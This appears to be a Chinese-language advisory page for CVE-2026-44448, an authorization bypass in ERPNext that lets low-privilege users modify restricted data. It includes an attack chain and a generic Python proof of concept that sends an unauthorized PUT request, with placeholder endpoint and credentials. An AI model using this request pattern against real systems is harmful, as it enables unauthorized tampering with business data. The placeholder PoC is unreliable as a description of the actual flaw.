CVE-2026-44448 CVSS 5.9 中危

CVE-2026-44448 ERPNext权限绕过漏洞

披露日期: 2026-05-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-44448

漏洞类型

权限绕过

CVSS评分

5.9 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

ERPNext

漏洞概述

ERPNext是一款开源的企业资源规划工具。在15.102.0和16.11.0之前的版本中，系统特定端点未能正确执行授权检查，导致低权限用户可以修改超出其角色权限的数据。该漏洞可能造成数据完整性受损，官方已在最新版本中修复此问题。

技术细节

该漏洞属于典型的访问控制失效（Broken Access Control）漏洞。在受影响的ERPNext版本中，服务器端在处理某些敏感API请求时，仅验证了用户的身份认证状态，而未对用户的具体角色权限进行严格校验。攻击者利用这一缺陷，只需具备一个低权限账户，即可通过发送特制的HTTP请求（如PUT或POST请求）直接访问并修改本应受限的关键业务数据。由于缺乏二次验证，服务器会接受并处理这些恶意请求，导致用户权限被提升或数据被非授权篡改。攻击者可以遍历ID，批量修改系统配置或其他用户的敏感信息，严重威胁系统的数据完整性和业务安全性。

攻击链分析

STEP 1

步骤1

攻击者注册或获取一个ERPNext系统的普通低权限用户账户。

STEP 2

步骤2

攻击者分析系统API或前端请求，识别出未进行严格权限校验的敏感端点。

STEP 3

步骤3

攻击者使用低权限账户的Session或API Key，构造恶意HTTP请求（如修改管理员配置或其他用户数据）。

STEP 4

步骤4

服务器接收请求，因缺少二次鉴权，执行了数据修改操作，导致越权攻击成功。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target ERPNext instance URL
TARGET_URL = "http://erpnext-target.com"
API_ENDPOINT = f"{TARGET_URL}/api/resource/SomeSensitiveData/doc_id_to_modify"

# Low-privilege user credentials (Valid session required)
API_KEY = "low_priv_api_key"
API_SECRET = "low_priv_api_secret"

# Headers with authentication
headers = {
    "Authorization": f"token {API_KEY}:{API_SECRET}",
    "Content-Type": "application/json"
}

# Payload attempting to modify data beyond user's role
payload = {
    "critical_field": "unauthorized_value",
    "status": "Approved"
}

try:
    # Sending PUT request to exploit the authorization bypass
    response = requests.put(API_ENDPOINT, json=payload, headers=headers)
    
    if response.status_code == 200:
        print("[+] Exploit successful! Data modified.")
        print(f"[+] Response: {response.text}")
    else:
        print(f"[-] Exploit failed or patched. Status code: {response.status_code}")
        print(f"[-] Response: {response.text}")

except Exception as e:
    print(f"[!] Error occurred: {e}")

影响范围

ERPNext < 15.102.0

ERPNext < 16.11.0

防御指南

临时缓解措施

如果无法立即升级，建议在网络边界部署WAF规则，限制对敏感API接口的访问权限，严格审查用户请求中的参数，并对关键数据变更操作进行二次人工审核或强制审批流程。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表